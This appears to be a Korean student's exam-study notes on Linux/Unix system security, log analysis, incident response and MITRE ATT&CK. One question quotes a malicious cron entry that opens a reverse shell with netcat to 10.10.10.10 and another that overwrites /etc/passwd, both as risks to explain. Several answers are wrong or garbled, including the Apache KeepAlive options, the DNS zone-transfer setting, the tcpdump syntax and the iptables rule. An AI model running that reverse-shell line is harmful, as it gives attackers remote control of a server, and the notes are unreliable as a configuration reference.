본문 바로가기

카테고리 없음

시스템 보안 시험

728x90

9주 - 로그 분석ㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡ

1. 피해 시스템 환경 점검시 필요한 5가지 점검 리스트를 작성하시오.

 - 소프트웨어 버전 확인

 - 외부에 열린 포트 확인

 - 시스템/네트워크 취약점 분석

 - 응용 프로그램 취약점 정보 확인

 - 기타 해킹흔적 정보 확인

 

2. 유닉스 중 파일 시스템의 사용 정보를 보여주는 명령어는?

df : 파일 시스템의 사용 정보를 보여주는 명령어.

 

3. 유닉스 중 실행되고 있는 모든 프로세스 정보를 확인하는 명령어는?

ps -aux(ps -elf)

 

4. 유닉스 중 시스템에서 현재 실행되고 있는 모든 프로세스를 기준으로 각각의 프로세스가 사용하는 모든 파일 목록을 보여주는 명령어는?

lsof : 시스템에서 현재 실행되고 있는 모든 프로세스를 기준으로 하여 각각의 프로세스가 상용하는 모든 파일 목록을 보여준다.

 

5. 유닉스 중 현재 로그인해 있는 사용자 및 사용자의 활동 정보를 수집하는 명령어는?

w : 현재 로그인해 있는 사용자 및 사용자의 활동 정보를 수집한다. 로그인해 있는 사용자 이름, 터미널 이름, 로그인 한 위치, 로그인 시간, 실행되고 있는 프로그램 등의 정보

 

6. 각종 인터넷 정보 서비스에 대한 접속 시도, 접속 성공, 접속 해제 등에 대한 사건들과 사용자 접속 시 인증과 관련된 사건들이 기록되는 로그 파일은?(파일 위치까지 작성)

var/log/secure

 : 각종 인터넷 정보 시스템에 대한 접속 시도, 접속 성공, 접속 해제 등에 대한 사건들과 사용자 접속 시 인증과 관련된 사건들이 기록된다.

 

7. 웹 서버 접속 로그 파일 2가지 작성하시오.

보통은' access_log' 파일이고

존재하지 않는 파일에 대한 접근 등의 에러 로그는 'error_log'파일에 기록

 

 - 유닉스/리눅스 시스템 해킹 사고 분석

1. 피해 시스템 환경 점검

소프트웨어 버전 확인, 외부에 열린 포트 확인, 시스템/네트워크 취약점 분석, 응용 프로그램 취약점 정보 확인, 기타 해킹 흔적 정보 확인

 

2. 유닉스 시스템 분석

#시스템 정보 확인

uptime / uname -a / df -k / env

#프로세스 정보 확인

ps -elf, ps -aux

#네트워크 정보 

netstat -anp

#열려진 모든 파일

lsof

#로그인 사용자 정보

w / last

#주요 설정 파일

/etc/passwd파일

/etc/hosts.equiv 및 ~/.rhost 파일 확인

/etc/hosts.allow and /etc/hosts.deny

/etc/inetd.conf and /etc.xinetd/*

/etc/rc*

cron과 at관련 파일

#피해 시스템 스캐닝

nmap

#로그 파일 점검

var/log/secure

var/log/message

var/log/xferlog

history파일

웹 서버 로그 파일

 

10주 - 서버 보안 활용ㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡ

1. 접근통제 기술에서 이 기술은 보안 레벨과 보안 허가증을 비교하는 것에 기반하는 접근 제어이며, 한 자원에 접근할 수 있는 허가증을 가진 개체가 단지 자신의 의지만으로 다른 개체가 자원에 접근하게 할 수 없기 때문에 이 정책은 'mandatory'라고도 부른다. 무엇에 대한 설명인가? MAC

 

2. 리눅스 시스템에서 시스템의 주요 설정파일이 위치한 디렉토리와 임시파일을 저장하는 디렉토리, 물리적 장치가 파일화되어 저장된 디렉토리를 나열한 것은? 4

  •  
  • /etc /temp /mnt
  •  
  • /sys /tmp /mnt
  • /sys /temp /dev
  • /etc /tmp /dev

 

 - 시스템 보안 서버관리 부분 문제

1. 다음 보기으 ㅣ기능을 위해 실행해야 할 명령어로 적절한 것은?

IPtables기능을 이용하여, 출발지가 192.168.1.24이며 목적지 포트가 TCP 22번인 패킷 허용.

-> iptables -A INPUT -p tcp -s 192.168.1.24 --dport 22 -j ACCEPT

 

2. Unix 계열서버 보안 설정 시 계정을 관리하기 위한 점검 항목으로 가장 적절치 않은 것은? =etc/passwd 소유자 및 권한 설정

root 계정 원격 접속 제한 / 패스워드 복잡성 설정 불필요한 계정 제거 / etc/passwd 소유자 및 권한 설정

 

3. 아래 지문은 어느 웹 서버의 로그이다. -> 4번 서버에서 클라이언트로 전송한 데이터 크기를 알 수 있다.

IIS 웹 서버 로그이다 / 클라이언트가 사용하는 웹 브라우저를 알 수 있다 / 헤더를 포함한 데이터 크기를 알 수 있다 / 서버에서 클라이언트로 전송한 데이터 크기를 알 수 있다.

 

4. 접근 통제 기술에서 이 기술은 보안 레벨과 보안 허가증을 비교하는 것에 기반하는 접근 제어이며, 한 자원에 접근할 수 있는 허가증을 가진 개체가 단지 자신의 의지만으로 다른 개체가 자원에 접근하게 할 수 없기 때문에 이정책은 mandatory라고도 부른다. -> MAC

 

5. 리눅스 시스템에서 패스워드 복잡도를 설정하기 위해 /etc/pam.d/system-auth를 편집하고 있다. 옵션으로 옳지 않은 것은?-> 3 scredit=-1

숫자를 1자 이상 포함 / 특수문자를 1자 이상 포함 / 영어 대문자를 1자 이상 포함 / 기존 패스워드와의 일치율 50%이상 금지

1. ucredit=-1 대문자

2. difok=10 소문자

3. scredit=-1 기타 특수문자

dcredit=-1 숫자

 

6. 리눅스에서 FTP에 대한 불법적인 접속을 감시하기 위해 로그를 검토하고자 한다. 어떤 로그가 적절한지? 4

1. sulog //su 명령 사용 내역

2. wtmp //사용자의 로그인, 로그아웃 시간, 시스템의 종료시간, 시스템 시작 시간 등을 기록(=last)

3. utmp //현재 로그인한 사용자 정보 기록(=w, who)

4. xferlog //FTP 접속 등을 기록

 

7. 다음 중 리눅스에서 로그를 확인하는 것과 가장 거리가 먼 면령어는? 4 find

 

# 마이터 어택ㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡ

본래 미국 연방정부의 지원을 받으며 국가안보관련 업무를 수행하던 비영리 연구개발 단체인 MITRE(마이터)는 국가간에도 사이버 공격의 영향력이 커지고 피해가 늘어나면서 자연스럽게 해당 부분에 대한 연구를 시작하게 되었는데 그렇게 만들어진 것이 ATT&CK(어택) Framework 이다.

 

마이터어택이란?

 : 마이터 어택은 공격자들의 최신 공격 기술 정보가 담긴 저장소

MITRE ATT&CK은 Adversarial Tactics, Techniques, and Common Knowledge의 약어이며, 실제 사이버 공격 사례를 관찰한 후 공격자가 사용한 악의적 행위(Adversary behaviors)에 대해서 공격방법(Tactics)과 기술(Techniques)의 관점으로 분석하여 다양한 공격그룹의 공격기법 들에 대한 정보를 분류해 목록화 해 놓은 표준적인 데이터 들이다.

 

전통적인 사이버 킬체인의 개념과는 약간 관점을 달리하여 지능화된 공격의 탐지를 향상시키기 위해 위협적인 전술과 기술을 체계화(패턴화)한 것인데, 원래 ATT&CK는 MITRE에서 윈도우 기업 네트워크 환경에 사용되는 해킹 공격에 대해서 방법(Tactics), 기술(Techniques), 절차(Procedures) 등 TTPs를 문서화하는 것으로 시작되었으며 이후 공격자로부터 발생한 일관된 공격 행동 패턴에 대한 분석을 기반으로 TTPs 정보를 매핑하여 공격자의 행위를 식별해 줄 수 있는 프레임워크로 발전하였다.

 

12주 - 침해사고 대응업무ㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡ

1. 정의

보안관제 : 정보통신망이나 정보시스템에 대한 사이버 공격정보 또는 보호 대상 자산의 안정성 위협정보를 탐지, 분석, 대응하는 일련의 활동

 

침해사고대응 : 정보통신 시스템에 대한 비인가 된 행위 또는 위협의 발생을 대응 하는 것.

법률적 의미 : 정보통신망 이용촉진 및 정보보호 등에 관한 법률 법(해킹, 바이러스, DDoS 등의 방법으로 정보통신망을 공격하는 행위로 발생한 사태)

 

디지털포렌식 : 디지털 관련 조사 및 수사를 지원하며 디지털 데이터가 법적 효력을 갖도록 과학적/논리적 절차와 방법을 연구하는 것.

 

2. 특징

 - 보안관제는 내/외부로부터의 해킹 시도를 탐지하고 침새사고는 더 나아가 분석, 원인분석, 복구 및 재발 방지까지 한다.

이 둘의 공통점으로 해킹에 신속하고 즉각적인 대응으로 피해를 최소화하고 로그를 통해 해킹 시도 여부를 빠르게 파악하는것이고

목적의 차이는 보안관제는 해킹시도 탐지와 빠른 긴급 대응이고, 침해사고는 정확한 분석과 피해 복구가 목적이다.

 

 - 대응 프로세스

[보안관제] 사고 전 준비 -> 사고탐지 -> 초기 대응 -> 

 대응 전략 체계화 ->

[침해 사고 ]-> 사고 조사 -> 보고서 작성 -> 재발방지 방안

 

 - 디지털 포렌식과 침해사고의 절차는 비슷하지만 포렌식은 법적 절차를 더 거친다.

디지털 포렌식 절차

사전준비 -> 증거 수집 -> 운반 및 보관 -> 분석 및 조사 -> 보고서 작성

 

14주차 - 정보보안기사 시험 문제ㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡ

1. MITRE는 사이버 공격 전술 및 기술에 대한 정보를 기반으로 하는 att&ck 프레임워크를 제공한다.

킬체인을 확장하여 구체적인 기술에 의해 지원되는 다양한 전술을 포함하며 14단계로 구성됩니다.

Reconnaissance(정찰)

Resource Develpment(자원 개발)

Initial Access(초기 접속)

Persistence(지속)

Privilege Escalation(권한 상승)

Defense Evasion(방어 회피)

Credential Access(접속 자격 증명)

Discovery(탐색)

Lateral Movement(내부 확산)

Collection(수집)

Command and Control(명령 및 제어)

Exfiltrasion(유출)

Impact(임팩트)

 

2. 크리덴셜 스터핑 공격은 무차별 대입 공격의 일종으로 공격자가 미리 확보해놓은 로그인 자격증명을 다른 계정에 무작위로 대입해 사용자 계정을 탈취하는 공격 방식이다.

공격 순서

1) 공격자는 웹사이트 위반 또는 비밀번호 덤프 사이트에서 유출된 사용자 이름과 비밀번호를 획득합니다.

2) 공격자는 계정 검사기를 사용하여 많은 웹 사이트에 대해 도난된 자격 증명을 테스트

3) 성공적인 로그인을 통해 공격자는 훔친 자격 증명과 일치하는 계정을 탈취 할 수 있다.

4) 공격자는 저장 가치, 신용 카드 번호 및 기타 개인 식별 정보의 도난 계정을 유출합니다.

5) 공격자는 다른 악의적인 목적을 위해 앞으로 계정 정보를 사용할 수도 있다.

 

3. CERT침해사고 대응 팀의 대응 방법 7단계

1) 사고 전 준비 과정 : 사고가 발생하기 전 침해사고대응팀과 조직적인 대응을 준비

2) 사고 탐지 : 정보보호 및 네트워크 장비에 의한 이상 징후 탐지, 관리자에 의한 침해 사고의 식별

3) 초기 대응 : 초기 조사 수행, 사고 정황에 대한 기본적인 세부사항 기록, 사고대응팀 신고 및 소집, 침해사고 관련 부서에 통지

4) 대응 전략 체계화 : 최적의 전략을 결정하고 관리자 승인을 획득, 초기 조사결과를 참고해 소송이 필요한 사항인지를 결정하여 사고 조사과정 시 수사기관 공조 여부를 판단

5) 사고 조사 : 데이터 수집 및 분석을 통하여 수행, 언제, 누가, 어떻게 사고가 일어났는지 피해 확산 및 사고 재발을 어떻게 방지할 것인지를 결정

6) 보고서 작성 : 의사 결정자가 쉽게 이해할 수 있는 형태로 사고에 대한 정확한 보고서를 작성

7) 해결 : 차기 유사 공격을 식별 및 예방하기 우한 보안 정책의 수립, 절차 변경, 사건의 기록, 장기 보안 정책 수립, 기술 수정 계획수립 등을 결정

 

4. 리눅스에서 사용되는 로그에 관한 설명이다. 각각 어떤 로그인지 적어라

  - 사용자들이 로그인, 로그아웃한 정보를 가지고 있으며, last 명령어에 사용된다 = wtmp

  - 시스템에 현재 로그인한 사용자들에 대한 상태정보를 가지고 있으며, who 명령어에 사용된다 = utmp

  - 5번 이상 로그인에 실패했을 경우에 로그인 실패 정보를 기록하며, lastb 명령어로 확인가능하다 = btmp

 

5. 리눅스/유닉스 시스템의 /etc/shadow에 관한 내용.

cat /etc/shadow

itwiki:$(1)6$(2)abc..def$(3)b6..Qk0t/:17132:0:99999:7: : :

(1)패스워드 방식(암호 알고리즘) (2)salt 값 (3)패스워드 해시

 

(2)를 통해 레인보우 테이블을 이용한 공격에 대응할 수 있는 이유?

 -> 레인보우 테이블이란 자주 쓰이는 패스워드에 대한 해시값 사전으로, salt를 사용함으로써 레인보우 테이블에 있는 같은 같은 패스워드라도 전혀 다른 해시값처럼 보이게 한다.

 

명령어 pwconv와 pwunconv의 용도를 설명하시오.

-> pwconv는 구형 리눅스에서 사용하던 /etc/passwd 방식을 /etc/shadow로 변환해준다. 

 pwunconv는 /etc/shadow 방식을 /etc/passwd 방식으로 변환한다.

 

6. 리눅스 웹서버인  Apache 설정파일 중 일부이다. 표시된 설정 내용이 의미하는 바는 무엇인가?

KeepAlive On = keepalive 옵션을 킨다.(속도를 개선시킬 수 있으나 동시접속량이 줄어든다.)

MaxKeepAliveRequests 100 = ~를 유지시키는 시간을 100초로 설정한다.

Keep AliveTimeout 100 = KeepAlive를 허용하는 유저 수를 100명으로 설정한다.

DirecroryIndex index.htm index.html = 디렉토리로 접근할 경우 index.htm을 먼저 읽고, 없으면 index.html을 읅는다.

CustomLog /www/logs/access_log/access_log common = 로그파일은 /www/logs/access_log 경로에 저장하고 Apache 기본 로그 포맷을 사용한다.

 

7. 리눅스 logrotate.conf 파일의 일부로 wtmp로그에 대해 로그파일을 압축하고 주 단위로 새로 생성하고자 할 때 옵션들은?

( A ) // compress

/var/log/wtmp{

( B ) // weekly

( C ) 0664 root utmp // : create

      minsize 1M

 rotate 1}

 

8. DNS서버인 192.168.1.18으로 axfr레코드 타입의 질의를 전송하였더니 deny 된것으로 확인되었다. 질의한 호스트 서버가 192.168.10.3이며, 정상적인 2차 DNS 서버라고 할 때 192.168.1.18의 named.conf에 어떤 설정이 포함되어야 하는가?

options{

directory "/var/named";

forward only;

forwarders{8.8.8.8;};

datasize 1024M;

(         ) // allow-query{192.168.10.3};

}

 

9. 침해사고 발생 이후 리눅스 시스템에서 다음과 같은 조사를 하였다. 명령어를 완성하시오.

1) 최근 7일 냉 변경된 모든 파일을 검색하는 명령어 = find / -mtime -7

2) 사용자가 root 이며 접근권한이 setuid로 설정된 모든 파일을 검색하는 명령어 = find / -user root -perm -4000

3) 호스트 192.168.253.3에서 192.168.10.48으로부터 이상(anomaly) 트래픽이 탐지되었다. Tcpdump 명령을 통해 이너페이스 eth0을 통해 192.168.253.3에서 192.168.10.48을 오가는 패킷 켭쳐하는 명령

 = tcpdump -l eth0 -n dst host 192.168.10.48 host src 192.168.10.48

 

10. 맥, 리눅스 등 운영체제 별로 디렉터리 경로는 다르지만 DNS의 정보를 담고 있는 파일이며 윈도우 7이상 버전에서는 관리자 외에 수정이 불가능 한 파일의 이름은 무엇인가?

 -> hosts

 

11. trustwave 사의 제품으로 아파치 웹서버, IIS에서 사용가능 한 공개용 웹 어플리케이션 방화벽은 무엇인가 ?

 -> ModSecurity

 

12. 리눅스 운영체제에서 현재 실행되고 있는 프로세스 정보를 기록하고 있는 디렉터리는 무엇인가?

 -> /proc

 

13. 악성코드 분류에 대해 답하시오.

키로거는 사용자가 키보드로 PC에 입력하는 내용을 몰래 낚아채어 기록하는 행위를 말한다. 하드웨어, 소프트웨어를 활용한 방법에서부터 전자적 음향기술을 활용한 기법까지 다양한 키로깅 방법이 존재한다. 다음은 사용자 몰래 키로거를 설치할 수 있는 방법들이다.

 

 1)드라이브바이다운로드(dbd) : 사용자가 접속한 웹페이지에서 팝업, iframe, 리다이렉트 등을 통해 사용자가 인식하지 못하게 악성코드를 다운로드 시키는 침해유형을 말한다. (워터링 홀이랑 비슷)

2) 드롭퍼 : 정상 애플리케이션인 것처럼 배포된 뒤 자신의 내부에 압축해서 가지고 있던 코드를 이용하여 새로운 악성코드를 생성하여 시스템을 감염시킨다.

 

14. APT는 지능형 지속공격으로 특정 회사의 중요 정보 획득, 정치적 목적, 사이버 테러 등을 목적으로 하는 해커에 의해 사이트, 기업, 개인을 상대로 지속적으로 해킹하는 공격을 의미한다. 이에 대한 대비책인 사이버킬체인은..

 

15. 파일 업로드 공격

파일 업로드 취약점은 존재하는 경우 공격자가 웹서버에 명령을 수행할 수 있도록 작성한(  )

를 업로드하여 명령을 실행해 관리자 권한을 획득후 웹페이지 소스코드 열람, 서버 내 파일유형, 백도어 프로그램 설치등을 할 수 있다.

-> 웹셸

 

16. 웹 서버를 점검하던 중 cron에 새로운 작업이 등록된 것을 확인하였다. 다음 cron 작업들이 root권한으로 실행될 경우 발생할 수 있는 위험에 대해 설명하시오.

0 0 6 * * root /bin/cp /tmp/passwd1 /etc/passwd : 임의로 조작된 passwd 파일이 원래 passwd 파일을 덮어쓴다.

0 0 12 * * root /usr/bin/nc 10.10.10.10 80 -e /bin/bash : 10.10.10.10 호스트에 80포트로 연결한다. 리버스쉘의 위험이 있다.

 

17. 다음은 사용자가 악성코드에 감염된 경로를 추적한 결과이다.

[경로 추적 결과] 

1) http://aaa.com 접속 후 게시물 열람

2) 200.11.22.33 일시적으로 접속 후 여러 여러 사이트 리다이렉트, 최종적으로 200.11.22.99 접속

3) 악성 실행파일 다운로드 후 자동 실행

 

위와 같은 공격 기법을 무엇이라 하는 가? = Drive By Download 공격

위와 같은 공격 기법 사용자가 실제 악성코드에 감염되는 곳은 어디인가? = 200.11.22.99

악성 코드에 대응하기 위한 정적, 동적 분석 방안을 설명하시오.

정적 분석 : 홈페이지 소스코드를 분석해 알려진 악성코드 경유지/중계지/유포지 또는 악성 스크립트 문자열을 포함하는 악성링크가 있는지 탐지하는 방식

동적 분석 : 가상환경을 구성해 여러가지 취약점에 노출시킨뒤 직접 홈페이지에 접속해 악성행위를 분석한다.

 

18. 다음 보기에서 설명하고 있는 것은 무엇인가?

동일한 취약점에 대해 해커와 보안업체간 다르게 사용해온 명칭을 표준화한 목록이며, 미국의 비열리기관인 MITRE의 테스트를 거쳐 호환성이 충족된 보안제품과 서비스에 한해 등록이 가능하다.

 -> CVE(Common Vulverabilities and Exposures)

 

19. 2018년 2월 28일 깃허브가 순간 트래픽이 1.35Tbps에 달하는 DDoS 공격을 받았다. 이는 당시에 역대 최대 큰 규모로 사용된 기법은 Memcached DDoS 기법이었다.

 -> Memcached 란 메모리를 사용해 캐시 서비스를 제공해주는 데몬으로 기업에서 대역폭을 효과적으로 사용하기 위하여 구축하는데, 공격자는 Memcached서버 ip주소의 기본 포트인 11211번 포트로 희생자 ip주소로 위장된 특정 명령의 UDP패킷(stats,set/get명령 등)을 전송하면 Memcached 서버가 희생자 IP로 원래 패킷보다 수배의 패킷을 반사하면 DRDoS공격이 수행되게 되었다.

 

20. 리눅스 서버에서 SMTP 서버의 릴레이 기능 제한 여부를 점검하여야 한다. 스팸 메일 릴레이 제한 설정할 수 있는 파일의 이름은?

-> sendmail.cf

 

21. 리눅스 서버의 보안 점검을 실시하려고 한다. 해당 항목에 대해 점검하기 위한 명령 또는 점검 과정을 기술하시오.

(1) root 계정 원격 접속 제한

(2) 계정 잠금 임계 값 설정(5이하)

(3) /etc/shadow 파일의 소유자 및 권한 확인

(4) iptables 명령을 이용해 SSH 포트 차단 하기

 

1 - /etc/securetty 파일에서 pts/0 ~ pts/x 설정 제거 또는 주석처리

  /etc/pam.d/login 파일에서 auto required /lib/security/pam_securitty.so 주석제거 또는 삽입

2 - 점검 : cat /etc/pam.d/system-auth 파일 확인

    auth required /lib/security/pam_tally.so deny=5

    unlock_time=120 no_magic_root

    account required /lib/security/pam_ 항목 확인

3 - ls -al /etc/shadow : 파일 소유자 및 권한 확인

4 - iptables -A INPUT -p tcp --dport 22 -j DROP

 

22. 로그은 어느 서버의 웹 로그로 이름은 http.log이다. 위 로그가 발생한 날짜, 시간 서버ip, 메소드, URL 시스템, 접속자 ip만을 awk 명령을 이용해 출력하기 위한 명령을 작성하시오.

 

23. 루그 파일이 생성될 경우 파일의 MAC time을 확인하여 공격자의 위/변조를 파악할 수 있는데 여기서 말하는 MAC tie은 무엇인가?

-> 1. 수정 시간 또는 Modified 2. 생성시간 Created 3. 접근시간 Accessed

 

24. 해당 로그가 기록하는 정보가 무엇인지 설명하라.

1. utmp

시스템에 현재 로그인한 사용자의 정보를 기록

사용자 로그아웃 시 기록 삭제

사용자 이름, 로그인한 시간, 터미널 장치 이름, 원격 호스트 이름 기록

 

2. syslog

사용자 인증과 관련된 로그와 커널, 데몬에서 생성된 모든 로그 포함

rsh, rlogin, ftp, finger, telnet, pop3 등의 접속 및 접속 실패 기록

버퍼 오버플로우 공격 시 관련된 로그 기록

 

3. messages

timestamp, 호스트명 등을 기록

su 실패 로그, 특정 데몬 비활성 로그, 부팅 시 발생한 에러 로그 기록

 

25. 명령 작성

/var/log 경로에 있는 파일 중 최근 3일 이내에 수정된 파일을 ./log/경로에 복사하시오.

 

26. 리눅스 운영체제에서 iptables, TCP wrapper, IPfilter를 활용해 접속 및 접근을 제한하려 할 때.

1. iptables를 활용해 출발지 대역 192.168.1.0에 대한 SSH 서비스 제한 시 추가해야 하는 규칙

iptables -A INPUT -p tcp -s 192.168.1.0/24 --dport 22 -j ACCEPT

2. TCP Wrapper에서 허용 정책과 관련된 파일 경로 및 파일 명

/etc/hosts.allow

3. IPfilter를 활용해 접속 제한 시 설정해야 하는 파일 경로 및 파일 명

/etc/ipf/ipf.conf